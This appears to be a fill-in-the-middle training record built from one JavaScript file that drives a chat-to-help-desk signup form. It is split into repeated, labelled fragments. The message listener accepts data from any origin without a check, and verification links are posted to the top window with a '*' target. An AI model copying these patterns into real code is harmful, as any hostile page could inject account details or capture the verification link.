var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
});
| {
nextAction();
} | conditional_block |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function isValid() |
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) {
nextAction();
} else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
});
| {
return !elements.passwordContainer.is('.error') &&
input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
} | identifier_body |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function isValid() {
return !elements.passwordContainer.is('.error') && |
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) {
nextAction();
} else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
trigger anything, and instead let `function register` call `validate`
on each input, later. */
function setInputValue(name, val) {
findInputElm(name).val(val);
}
function findInputElm(name) {
var selector = 'form.reg [name="' + name + '"]';
return $(selector);
}
function handleAccountCreationSuccess(verificationUri) {
postMessageToZopim('accountCreated', verificationUri);
}
function handleAccountCreationFailure() {
elements.root.addClass('error');
toggleLoading(false, 'loading-creating');
}
function translatedParagraph(clazz) {
return elements.root.find('.translated').find('.' + clazz);
}
function postMessageToZopim(action, data) {
window.top.postMessage(JSON.stringify({
target: 'zdSignup',
action: action,
data: data
}), '*');
}
function toggleLoading(isLoading, clazz) {
clazz = (clazz || '') + ' loading';
elements.root.toggleClass(clazz, isLoading);
}
/* Test with any of
```
window.postMessage(JSON.stringify({
owner_email: 'foo@bar.com',
owner_phone: '123-123-1234',
owner_name: 'first last',
company_name: 'megacorp',
number_employees: 234,
language: 'fr',
currency: 'EUR',
agents: [
{
name: 'agent num0',
email: 'agent+0@zendesk.com'
},
{
name: 'agent num1',
email: 'agent+1@zendesk.com'
}
],
plan_name: 'this is the plan name'
}), window.location.origin)
window.postMessage('{"owner_name":"Test Agent Owner","owner_email":"testagent@zopim.com","agents":[{"name":"Test Agent 1","email":"a1@z.com"},{"name":"Test Agent 2","email":"a2@z.com"},{"name":"Test Agent 3","email":"a3@z.com"},{"name":"Test Agent 4","email":"a4@z.com"},{"name":"Test Agent 5","email":"a5@z.com"}],"company_name":"testaccount","number_employees":"","language":"en"}', location.origin)
``` */
$(window).on('message onmessage', function(e) {
var chatAccount_ = e.data || (e.originalEvent && e.originalEvent.data);
if (!chatAccount_) {
return;
}
try {
chatAccount_ = JSON.parse(chatAccount_);
} catch (err) {
return;
}
// Ignore a myriad of other kinds of valid `postMessage`s.
if (!chatAccount_.owner_email) {
return;
}
chatAccount = chatAccount_;
if (chatAccount.agents && chatAccount.agents.length) {
$('.include-agents').addClass(shownClass);
}
toggleLoading(false);
});
/* After onmessage handler is attached, let the embedding zopim page know
it can postMessage to this reg form. */
postMessageToZopim('formReady');
$('.reg-xsell-from-chat-already-have').on('click', function() {
postMessageToZopim('showIntegrate');
});
elements.subdomainContainer
.addClass(shownClass)
.find('input')
.prop('placeholder', translatedParagraph('subdomain-placeholder').text());
elements.passwordContainer
.find('input')
.prop('placeholder', translatedParagraph('password-placeholder').text());
swapNextButtonHandler();
}); | input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
} | random_line_split |
p-register-xsell-from-chat.js | $(function() {
/* Setup.
Disable pushing states, b/c we don't support backwards navigation, i.e. we
don't re-enable the Next button, to keep things simple.
The initial pushing of the #getstarted state still happens before we can
disable it. */
webutils.pushStateFragment = $.noop;
var elements = {
root: $('.reg-xsell-from-chat'),
/* Payloads for both account creation and eloqua are made by searching for
inputs within `form.reg`. Any of them will do. */
extraInputsParent: $('form.reg').first(),
subdomainContainer: $('.domain'),
passwordContainer: $('.password-row'),
nextButton: $('.reg-xsell-from-chat-next')
};
var shownClass = 'reg-xsell-from-chat-shown';
/* Data will be pushed from zopim. */
var chatAccount;
var currentStep = -1;
/* Behaviors of the Next button at each step. */
var nextButtonHandlers = [
function() {
var input = elements.subdomainContainer.find('input');
function isValid() {
return input.is('.set') &&
Number(elements.subdomainContainer.find('label.error').css('opacity')) === 0 &&
Number(elements.subdomainContainer.find('label.suggested').css('opacity')) === 0;
}
function toNextStep() {
swapNextButtonHandler();
$('.domain-ping').hide();
elements.subdomainContainer.removeClass(shownClass);
elements.passwordContainer.addClass(shownClass);
}
triggerNextActionOnValidatedUserInput(input, isValid, toNextStep);
},
function() {
var input = elements.passwordContainer.find('input');
function | () {
return !elements.passwordContainer.is('.error') &&
input.is('.set') &&
Number(elements.passwordContainer.find('label.error').css('opacity')) === 0;
}
triggerNextActionOnValidatedUserInput(input, isValid, createAccount);
}
];
function swapNextButtonHandler() {
++currentStep;
elements.nextButton
.off('click')
.on('click', nextButtonHandlers[currentStep]);
}
function triggerNextActionOnValidatedUserInput(input, isValid, nextAction) {
var initVal = input.val();
if (isValid()) {
nextAction();
} else {
/* Just in case validation hasn't happened yet or the input was never
focused on by the user at all (eg auto-populated by browser), force
trigger validation.
`isValid` is expected to return false when validation hasn't happened
yet. */
input.trigger('blur');
disableNextButtonTillValidated(isValid, function() {
var currVal = input.val();
/* If the value that is now finally valid is different from the original
invalid value when user tried to trigger the next action, then do not
automatically trigger the next action but force the user to trigger
it again.
Eg when subdomain validation picks a different value, or when user
corrects the password and blurs from the input, give user a chance to
think about this new value, and force user to click on the Next button
again. */
if (initVal != currVal) {
return;
}
nextAction();
});
}
}
function disableNextButtonTillValidated(isValid, whenValid) {
var intervalId;
function toggleDisable(disable) {
elements.nextButton
.prop('disabled', disable)
.toggleClass('btn-disabled', disable);
}
toggleDisable(true);
intervalId = setInterval(function() {
if (isValid()) {
clearInterval(intervalId);
whenValid();
toggleDisable(false);
}
}, 300);
}
function createAccount() {
var subdomainInputName = 'account[subdomain]';
var subdomainInput, subdomain;
toggleLoading(true, 'loading-creating');
/* Turn off further validation on subdomain while clearbit changes the value
and we override it back. */
subdomainInput = findInputElm(subdomainInputName)
.off('keypress keyup keydown focus blur');
/* Need to keep subdomain b/c it'll be overridden by clearbit. */
subdomain = subdomainInput.val();
/* Populate inputs to pass validation, so clearbit can run. */
encodeChatAccountInDom();
/* Hack this fn again, this time as a callback for clearbit completion. */
webutils.pushStateFragment = function() {
webutils.pushStateFragment = $.noop;
/* Encode again to override clearbit. */
encodeChatAccountInDom();
setInputValue(subdomainInputName, subdomain);
/* Hack. Prevent redirecting on current window. Also conveniently use it to
attach a callback. */
webutils.redirect = handleAccountCreationSuccess;
window.handleAccountCreationFailure = handleAccountCreationFailure;
/* Prob not needed since we took validation off subdomain, but just in case. */
$('.domain-ping').hide();
/* Note, this implements a retry logic (but is disabled atm). */
$('.create-account').trigger('click');
};
/* Call clearbit. This is the earliest opportunity we have to do so.
Validation must pass for all inputs within .step-1, which contains
password and email. Password was filled in our 2nd step, and email was
filled by `encodeChatAccountInDom`. */
$('.step li.error').removeClass('error');
$('.step-1 a.next').trigger('click');
}
/* The underlying implementation for account creation reads DOM to construct
payload, so we have to dump a representation of agents into DOM first.
The inputs can be children of any `form.reg`.
number_employees is not available for older accounts.
owner_phone is not available.
currency is not available.
(But leave the logic for population here anyway. Defaults are used to pass
valiation.) */
function encodeChatAccountInDom() {
setInputValue('owner[email]', chatAccount.owner_email);
encodeCompanyName();
setInputValue('account[help_desk_size]', chatAccount.number_employees || '1-9');
setInputValue('owner[name]', chatAccount.owner_name);
setInputValue('address[phone]', chatAccount.owner_phone || '000-000-0000');
encodeLanguage();
encodeCurrency();
toggleEncodeAgents();
encodeEloqua();
}
/* Pick the first non-empty value among those [
provided by zopim,
detected by clearbit which should already be encoded in dom,
email host
]. */
function encodeCompanyName() {
var name = 'account[name]';
function emailHost(email) {
return email.match(/@(.+)\./)[1];
}
if (chatAccount.company_name) {
setInputValue(name, chatAccount.company_name);
} else if (!findInputElm(name).val()) {
setInputValue(name, emailHost(chatAccount.owner_email));
}
}
/* Attr `name=language` is changed to `name=account[language]` if using fast
creation; let jquery find either.
When setting <select>'s `value`, if it's not support by one of the <option>
elements, then the `value` would be null. Then, the value would be defaulted
to US English by Classic.
To avoid this defaulting, set iff there is a match; otherwise, defer to the
existing code which infers it from `location.host`.
The list of Chat's language codes is at
https://github.com/zopim/meshim-frontend/blob/master/src/meshim/dashboard/controllers/Language.js */
function encodeLanguage() {
var select = findInputElm('language').add(findInputElm('account[language]'));
var options = select.children('option');
var code = chatAccount.language.replace(/_/, '-').toLowerCase();
var isCodeValid = hasOption(code);
function hasOption(val) {
return options.filter(function() {
return this.value === val;
}).length;
}
if (!isCodeValid) {
code = code.replace(/-.*/, '');
isCodeValid = hasOption(code);
}
if (isCodeValid) {
setInputValue('language', code);
setInputValue('account[language]', code);
}
}
/* Supported values are the case-insensitive versions of the `CurrencyType`
constants in
https://github.com/zendesk/zendesk_types/blob/master/lib/zendesk/types.rb
Other values including the empty value is defaulted to 'USD' by Classic.
To avoid this defaulting, set iff value is supported; otherwise, defer to the
existing code which infers it from `location.host`. */
function encodeCurrency() {
if (!chatAccount.currency) {
return;
}
var currency = chatAccount.currency.toUpperCase();
if (['USD','EUR','GBP','JPY'].indexOf(currency) >= 0) {
setInputValue('account[currency]', currency);
}
}
function toggleEncodeAgents() {
var className = 'reg-xsell-from-chat-agent';
var doPopulate = $('.include-agents input').prop('checked');
var inputs;
elements.extraInputsParent.find('.' + className).remove();
if (doPopulate) {
inputs = $();
$.each(chatAccount.agents, function(i, agentData) {
var namePrefix = 'agents[' + i + ']';
agentData.role = 'Agent';
$.each(['name', 'email', 'role'], function(j, prop) {
inputs = inputs.add(
$('<input type="hidden">')
.addClass(className)
.attr('name', namePrefix + '[' + prop + ']')
.val(agentData[prop])
);
});
});
inputs.appendTo(elements.extraInputsParent);
}
}
function encodeEloqua() {
var chatPlanInputName = 'Chat_plan';
var chatPlanInput = findInputElm(chatPlanInputName);
if (!chatPlanInput.length) {
// webutils.postToEloqua requries id and type attrs.
chatPlanInput = $('<input type="text">')
.attr('id', chatPlanInputName)
.attr('name', chatPlanInputName)
.appendTo(elements.extraInputsParent);
}
chatPlanInput.val(chatAccount.plan_name);
/* Need to use a different eloqua form */
setInputValue('elqFormName', 'chatxsell');
}
/* Defining a separate function for setting value, so that in case we want
to e.g. trigger events before and after setting it, it'd be easy to write it
here.
Events that we might want include click, focus, keypress, change. These
events are handled by the underlying code for various purposes including
validation.
But b/c the underlying code is really involved, it's probably safer to not
